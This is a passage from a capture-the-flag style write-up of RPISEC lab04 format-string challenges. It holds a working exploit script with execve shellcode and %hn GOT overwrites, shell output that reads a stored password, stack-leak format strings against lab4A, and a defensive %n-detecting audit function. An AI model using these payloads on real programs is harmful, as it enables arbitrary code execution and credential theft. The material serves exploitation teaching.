Nevertheless we must remember that this address may vary when directly running the binary without <code>gdb<\/code>.<\/p>\n<p>Finally we can write a python-script which will create the input to the program:<\/p>\n<pre class=\"brush: python; first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ cat \/tmp\/exploit_lab4B.py\r\nimport sys\r\nfrom pwn import *\r\n\r\nshellcode = &quot;\\x31\\xc0&quot;\\\r\n            &quot;\\x83\\xec\\x04&quot;\\\r\n            &quot;\\x89\\x04\\x24&quot;\\\r\n            &quot;\\x68\\x2f\\x2f\\x73\\x68&quot;\\\r\n            &quot;\\x68\\x2f\\x62\\x69\\x6e&quot;\\\r\n            &quot;\\x89\\xe3&quot;\\\r\n            &quot;\\x89\\xc1&quot;\\\r\n            &quot;\\x89\\xc2&quot;\\\r\n            &quot;\\xb0\\x0b&quot;\\\r\n            &quot;\\xcd\\x80&quot;\\\r\n            # len = 28\r\n\r\nexit_got  = 0x080499b8\r\naddr_buf  = int(sys.argv&#x5B;1], 16) # gdb: 0xbffff6a8\r\n\r\nvalue_u2 = addr_buf &gt;&gt; 16\r\nvalue_l2 = addr_buf &amp; 0xffff\r\n\r\nexpl  = shellcode\r\nexpl += p32(exit_got+2) # upper bytes at higher address --&gt; little endian!\r\nexpl += p32(exit_got)\r\nexpl += &quot;%&quot; + str(value_u2 - 28 - 8) + &quot;x&quot;\r\nexpl += &quot;%13$hn&quot;\r\nexpl += &quot;%&quot; + str(value_l2 - value_u2) + &quot;x&quot;\r\nexpl += &quot;%14$hn&quot;\r\n\r\nsys.stdout.write(expl+&quot;\\n&quot;)\r\n<\/pre>\n<p>The following picture illustrates, how <code>printf<\/code> evaluates the string provided by the python-script:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04.png\" alt=\"\" width=\"831\" height=\"831\" class=\"alignnone size-full wp-image-361\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04.png 831w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-150x150.png 150w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-300x300.png 300w, 
https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-768x768.png 768w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-100x100.png 100w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/p>\n<p>The first 28 bytes of the user input are the shellcode we adjusted to overcome the lower-case conversion. The next 4 bytes are the address of the GOT entry of <code>exit<\/code> <code>+2<\/code>, followed by another 4 bytes which are the exact address of <code>exit<\/code>&#8216;s GOT entry. This is done because we do not write all 8 hex digits of our shellcode address at once, but 4 hex digits (2 bytes) at a time. This way we can limit the number of characters we need to print. The only difference between the format specifiers <code>%hn<\/code> and <code>%n<\/code> is that <code>%hn<\/code> stores its count into an unsigned short (2 bytes) instead of an unsigned integer (4 bytes).<\/p>\n<p>One important aspect is that we need to write the lower of the two values first, because the character count only ever grows: we can easily print more characters before the second write, but never fewer.<\/p>\n<p>Summing it up <code>printf<\/code> will:<br \/>\n&#8211;> Print the first 36 static characters (our shellcode + the 2 addresses).<br \/>\n&#8211;> Print the first element on the stack padded to 49115 characters.<br \/>\n&#8211;> Write the number of characters printed so far (<code>36+49115 = 49151 = 0xbfff<\/code>) to address <code>exit_got+2<\/code>.<br \/>\n&#8211;> Print the second element on the stack padded to 13913 characters.<br \/>\n&#8211;> Write the number of characters printed so far (<code>49151+13913 = 63064 = 0xf658<\/code>) to address <code>exit_got<\/code>.<\/p>\n<p>As you may have noticed, I have already changed the address of our shellcode from <code>0xbffff6a8<\/code> to <code>0xbffff658<\/code>, since the address determined using <code>gdb<\/code> differs slightly from the address when directly executing the binary. 
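<\/p>\n<p>As an added example that is not part of the original writeup, the following Python function parses a format string the way <code>printf<\/code> does and reports every <code>%n<\/code>-family store, the argument index it dereferences and the running character count at that point. That is the defender-side check to put in front of any <code>printf<\/code>-like call that receives untrusted input, and it reproduces the counts from the list above. The function names, the stand-in prefix of 36 <code>A<\/code> characters and the benign sample strings are my own assumptions; only the specifier sequence <code>%49115x%13$hn%13913x%14$hn<\/code> comes from the script above.<\/p>

```python
import re

# One printf conversion specification (C99 7.19.6.1) with the POSIX "n$"
# positional-argument extension that glibc implements:
#     %[n$][flags][width][.precision][length]conversion
# Assumption: "*" widths/precisions are taken as sequential arguments; the
# positional "*m$" form is not modelled.
SPEC_RE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?"
    r"(?P<flags>[-+ #0]*)"
    r"(?P<width>\*|\d+)?"
    r"(?:\.(?P<prec>\*|\d+)?)?"
    r"(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

# Size in bytes of the store performed by %n for each length modifier
# (ILP32 sizes, matching the 32-bit lab binary).
N_STORE_SIZE = {None: 4, "hh": 1, "h": 2, "l": 4, "ll": 8, "j": 8, "z": 4, "t": 4}


def audit_format_string(fmt):
    """Parse a format string and report what a printf-family call would do.

    Returns a dict:
      writes     - one entry per %n-family conversion: the argument index it
                   dereferences, the store size in bytes, the lower bound of
                   characters printed before it, and the value actually stored
                   (the count truncated to the store size)
      reads      - number of conversions that read an argument (stack leaks)
      positional - True if any "n$" specifier is used
      max_arg    - highest argument index referenced
      min_output - lower bound on the characters printed by the whole call
    The lower bound counts literal text, every explicit width, and one
    character for each numeric or %c conversion without a width.
    """
    if isinstance(fmt, bytes):          # raw input: keep one char per byte
        fmt = fmt.decode("latin-1")
    printed = 0
    next_arg = 1
    max_arg = 0
    reads = 0
    writes = []
    positional = False
    last = 0
    for m in SPEC_RE.finditer(fmt):
        printed += m.start() - last     # literal text before this specifier
        last = m.end()
        conv = m.group("conv")
        if conv == "%":
            printed += 1                # "%%" prints one literal percent sign
            continue
        if m.group("width") == "*":     # "*" pulls the width from the arguments
            next_arg += 1
        if m.group("prec") == "*":
            next_arg += 1
        if m.group("pos"):
            positional = True
            arg = int(m.group("pos"))
        else:
            arg = next_arg
            next_arg += 1
        max_arg = max(max_arg, arg)
        if conv == "n":
            size = N_STORE_SIZE.get(m.group("length"), 4)
            writes.append({
                "arg": arg,
                "size": size,
                "count": printed,
                "stored": printed & ((1 << (8 * size)) - 1),
            })
            continue
        reads += 1
        width = m.group("width")
        if width and width != "*":
            printed += int(width)       # field width is a floor on the output
        elif conv != "s":
            printed += 1                # numbers and %c print at least one char
    printed += len(fmt) - last          # trailing literal text
    return {
        "writes": writes,
        "reads": reads,
        "positional": positional,
        "max_arg": max_arg,
        "min_output": printed,
    }


def is_dangerous(fmt):
    """True if the string would make printf store through a pointer (%n family)."""
    return bool(audit_format_string(fmt)["writes"])


if __name__ == "__main__":
    # Constructed stand-in for the 36 static bytes (28 bytes of shellcode plus
    # the two 4-byte GOT addresses) that precede the format specifiers.
    static_prefix = "A" * 36
    report = audit_format_string(static_prefix + "%49115x%13$hn%13913x%14$hn")
    for w in report["writes"]:
        print("arg %d: %d-byte store of %#x" % (w["arg"], w["size"], w["stored"]))
```

<p>Run against the script's specifier sequence, the audit reports two 2-byte stores through arguments 13 and 14 with counts <code>49151<\/code> (<code>0xbfff<\/code>) and <code>63064<\/code> (<code>0xf658<\/code>), matching the list above. On ordinary logging strings <code>writes<\/code> is empty, so <code>is_dangerous<\/code> works as an input filter, and <code>positional<\/code> flags the <code>n$<\/code> form that is needed to address a chosen stack slot, which is worth alerting on even when no <code>%n<\/code> is present.<\/p>\n<p>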
In order to quickly test a few addresses, I have defined the shellcode address as an argument to the python script.<\/p>\n<p>Now we only need to create the final input to the program:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ python \/tmp\/exploit_lab4B.py 0xbffff658 &gt; \/tmp\/out\r\n<\/pre>\n<p>And run the binary with that input:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ (cat \/tmp\/out; cat) | .\/lab4B\r\n1\u2592\u2592\u2592$h\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                   \u0340\u2592\u2592                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            64                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               b7fcdc20\r\nwhoami\r\nlab4A\r\ncat \/home\/lab4A\/.pass\r\nfg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3\r\n<\/pre>\n<p>Done \ud83d\ude42 The password is <code>fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3<\/code>.<\/p>\n<hr \/>\n<h1 id=\"lab4A\">lab4A<\/h1>\n<p>We connect to the last level of lab04 using the credentials <span style=\"color: 
#ff0000;\">lab4A<\/span> with the password <span style=\"color: #ff0000;\">fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4A@localhost\r\nlab4A@localhost's password: (fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\n\r\nLast login: Mon Jan 22 03:50:48 2018 from localhost\r\n<\/pre>\n<p>As always we start by analysing the source code:<\/p>\n<pre class=\"brush: cpp; first-line: 0; highlight: [20,21,23,34,35,39,45,48,64,65]; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ cat lab4A.c\r\n\/*\r\n *   Format String Lab - A Problem\r\n *   gcc -z execstack -z relro -z now -o lab4A 
lab4A.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;sys\/types.h&gt;\r\n#include &lt;sys\/stat.h&gt;\r\n#include &lt;fcntl.h&gt;\r\n#include &lt;unistd.h&gt;\r\n\r\n#define BACKUP_DIR &quot;.\/backups\/&quot;\r\n#define LOG_FILE &quot;.\/backups\/.log&quot;\r\n\r\nvoid\r\nlog_wrapper(FILE *logf, char *msg, char *filename)\r\n{\r\n    char log_buf&#x5B;255];\r\n    strcpy(log_buf, msg);\r\n    snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1\/*NULL*\/, filename);\r\n    log_buf&#x5B;strcspn(log_buf, &quot;\\n&quot;)] = '&#92;&#48;';\r\n    fprintf(logf, &quot;LOG: %s\\n&quot;, log_buf);\r\n}\r\n\r\nint\r\nmain(int argc, char *argv&#x5B;])\r\n{\r\n    char ch = EOF;\r\n    char dest_buf&#x5B;100];\r\n    FILE *source, *logf;\r\n    int target = -1;\r\n\r\n    if (argc != 2) {\r\n        printf(&quot;Usage: %s filename\\n&quot;, argv&#x5B;0]);\r\n    }\r\n\r\n    \/\/ Open log file\r\n    logf = fopen(LOG_FILE, &quot;w&quot;);\r\n    if (logf == NULL) {\r\n        printf(&quot;ERROR: Failed to open %s\\n&quot;, LOG_FILE);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    log_wrapper(logf, &quot;Starting back up: &quot;, argv&#x5B;1]);\r\n\r\n    \/\/ Open source\r\n    source = fopen(argv&#x5B;1], &quot;r&quot;);\r\n    if (source == NULL) {\r\n        printf(&quot;ERROR: Failed to open %s\\n&quot;, argv&#x5B;1]);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/\/ Open dest\r\n    strcpy(dest_buf, BACKUP_DIR);\r\n    strncat(dest_buf, argv&#x5B;1], 100-strlen(dest_buf)-1\/*NULL*\/);\r\n    target = open(dest_buf, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR);\r\n    if (target &lt; 0) {\r\n        printf(&quot;ERROR: Failed to open %s%s\\n&quot;, BACKUP_DIR, argv&#x5B;1]);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/\/ Copy data\r\n    while( ( ch = fgetc(source) ) != EOF)\r\n        write(target, &amp;ch, 1);\r\n\r\n    log_wrapper(logf, &quot;Finished back up &quot;, 
argv&#x5B;1]);\r\n\r\n    \/\/ Clean up\r\n    fclose(source);\r\n    close(target);\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n<p>What does the program do?<br \/>\n&#8211;> The program is supposed to be run with one argument (line 34-35).<br \/>\n&#8211;> A logfile is opened, which is passed to the function <code>log_wrapper<\/code> (line 39, 45).<br \/>\n&#8211;> The argument passed to the program is interpreted as a filename (line 48).<br \/>\n&#8211;> The given file is copied byte-by-byte to the folder <code>.\/backups\/<\/code> (line 64-65).<br \/>\n&#8211;> The function <code>log_wrapper<\/code> copies the given message (<code>msg<\/code>) into a temporary buffer (<code>log_buf<\/code>) (line 20).<br \/>\n&#8211;> The filename, taken from the argument passed to the program, is appended to that buffer using <code>snprintf<\/code> (line 21).<br \/>\n&#8211;> The temporary buffer (<code>log_buf<\/code>) is written to the logfile (line 23).<\/p>\n<p>Where is the vulnerability within the program?<\/p>\n<p>Since the source code is a little larger, the vulnerability is not as obvious as in the last level. Yet again we are dealing with a format string vulnerability. This time it is not <code>printf<\/code> that is affected but <code>snprintf<\/code>. On line 21 <code>snprintf<\/code> is called with <code>filename<\/code> as its third argument, which is the format string. This is the filename the user provided when running the program. That means that the format string is user controlled and we can use the exploitation techniques described in the last two levels.<\/p>\n<p>One may think that <code>snprintf<\/code> is more secure than <code>printf<\/code> since there is a size parameter (second argument), but this only sets the maximum number of characters to write into the provided buffer (first argument). One may also think that this prevents the <code>%n<\/code> specifier technique since we can only write a limited number of characters. But that is not completely true. 
Indeed we cannot write more bytes to the provided buffer, but the <code>%n<\/code> specifier does not evaluate to the number of bytes actually written but to the number of characters that would have been written had the buffer been large enough! Despite the length limit of the buffer we can still use the <code>%n<\/code> specifier to write arbitrary data to an arbitrary address.<\/p>\n<p>In the last level we overwrote an entry in the Global Offset Table (GOT) in order to redirect the control flow. This time we cannot do that, because the binary is compiled with <code>Full RELRO<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ checksec lab4A\r\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY FORTIFIED FORTIFY-able  FILE\r\nFull RELRO      Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   Yes     0               10      lab4A\r\n<\/pre>\n<p>With <code>Full RELRO<\/code> enabled the entire GOT is remapped as read-only. Thus we cannot alter any values there. Also a <code>STACK CANARY<\/code> has been found. A stack canary is a random value which is placed on the stack on every function call. When leaving a function, it is verified that the value has not been altered. If the value has changed, the program terminates. When we try to overwrite the return address in a simple buffer overflow the stack canary gets overwritten because all bytes from the beginning of the buffer up to the return address have to be filled. Since we have identified a format string vulnerability we can write to one specific address without touching the stack canary. That is why a stack canary will not prevent us from overwriting the return address on the stack. That is what we are going to do here.<\/p>\n<p>Now that we have figured out how to control the instruction pointer, we have to decide where to point it. Fortunately <code>NX<\/code> is still disabled. 
This means that we can store a shellcode on the stack and execute it.<\/p>\n<p>What are we going to do?<br \/>\n&#8211;> Determine the argument selector for the buffer we can write to (<code>log_buf + offset for strlen(msg)<\/code>).<br \/>\n&#8211;> Determine the address of the buffer in order to overwrite the return address for the function <code>log_wrapper<\/code> correspondingly.<br \/>\n&#8211;> Determine the address where the return address is stored.<br \/>\n&#8211;> Store a shellcode in the buffer and use the <code>%n<\/code> specifier to overwrite the return address with the address of the buffer (shellcode).<\/p>\n<h2>argument selector<\/h2>\n<p>In order to run the program there must be a <code>backups<\/code> folder in the current directory:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ .\/lab4A test\r\nERROR: Failed to open .\/backups\/.log\r\nlab4A@warzone:\/levels\/lab04$ mkdir backups\r\nmkdir: cannot create directory \u2018backups\u2019: Permission denied\r\n<\/pre>\n<p>We cannot create a directory in <code>\/levels\/lab04<\/code> and must run the program for example from <code>\/tmp<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ cd \/tmp\r\nlab4A@warzone:\/tmp$ mkdir backups\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A test\r\nERROR: Failed to open test\r\n<\/pre>\n<p>The program prints an error because there is no file called <code>test<\/code> in the current directory, but now there is no error that the file <code>.\/backups\/.log<\/code> cannot be opened. 
This suffices since the function <code>log_wrapper<\/code> already gets called (see line 45 of the source code) and adds a log entry:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ cd backups\r\nlab4A@warzone:\/tmp\/backups$ cat .log\r\nLOG: Starting back up: test\r\n<\/pre>\n<p>Now we run the program with a filename containing a 4 byte pattern and multiple format specifiers to leak the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x\r\nERROR: Failed to open AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x\r\nlab4A@warzone:\/tmp$ cat backups\/.log\r\nLOG: Starting back up: AAAA.b7e9eb73.b7e9548c.bffff842. 8048cda. 804b008.       0.       0.b7e24994.617453c8.6e697472.61622067.75206b63.41203a70.2e414141.39653762.33376265\r\n<\/pre>\n<p>The 14th element contains our pattern, but only 3 bytes of it (<code>2e<u>414141<\/u><\/code>). 
The 4th byte is within the 13th element: <code><u>41<\/u>203a70<\/code>.<\/p>\n<p>That means that we have to add 1 byte at the beginning of the buffer in order to align the characters to the 4 byte chunks on the stack.<\/p>\n<p>We can verify this using the argument selector (do not forget to escape the <code>$<\/code> in bash):<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A XAAAA.%14\\$08x\r\nERROR: Failed to open XAAAA.%14$08x\r\nlab4A@warzone:\/tmp$ cat backups\/.log\r\nLOG: Starting back up: XAAAA.41414141\r\n<\/pre>\n<p>The additional <code>X<\/code> at the beginning of the filename aligns the characters to the 4 byte chunks on the stack.<\/p>\n<h2>address of buffer and return address<\/h2>\n<p>In order to determine the address of the buffer and the return address we use <code>gdb<\/code>, keeping in mind that these addresses may vary:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,3,13,17]; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ gdb \/levels\/lab04\/lab4A\r\nReading symbols from \/levels\/lab04\/lab4A...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble log_wrapper\r\nDump of assembler code for function log_wrapper:\r\n   0x080488fd &lt;+0&gt;:     push   ebp\r\n   0x080488fe &lt;+1&gt;:     mov    ebp,esp\r\n   0x08048900 &lt;+3&gt;:     push   ebx\r\n   ...\r\n   0x08048972 &lt;+117&gt;:   mov    eax,DWORD PTR &#x5B;ebp-0x124]\r\n   0x08048978 &lt;+123&gt;:   mov    DWORD PTR &#x5B;esp+0x8],eax\r\n   0x0804897c &lt;+127&gt;:   mov    DWORD PTR &#x5B;esp+0x4],ebx\r\n   0x08048980 &lt;+131&gt;:   mov    DWORD PTR &#x5B;esp],edx\r\n   0x08048983 &lt;+134&gt;:   call   0x80487c0 &lt;snprintf@plt&gt;\r\n   ...\r\n   0x080489dd &lt;+224&gt;:   pop    ebx\r\n   0x080489de &lt;+225&gt;:   pop    ebp\r\n   0x080489df &lt;+226&gt;:   ret\r\nEnd of assembler dump.\r\n<\/pre>\n<p>The locations we are interested in are the call to 
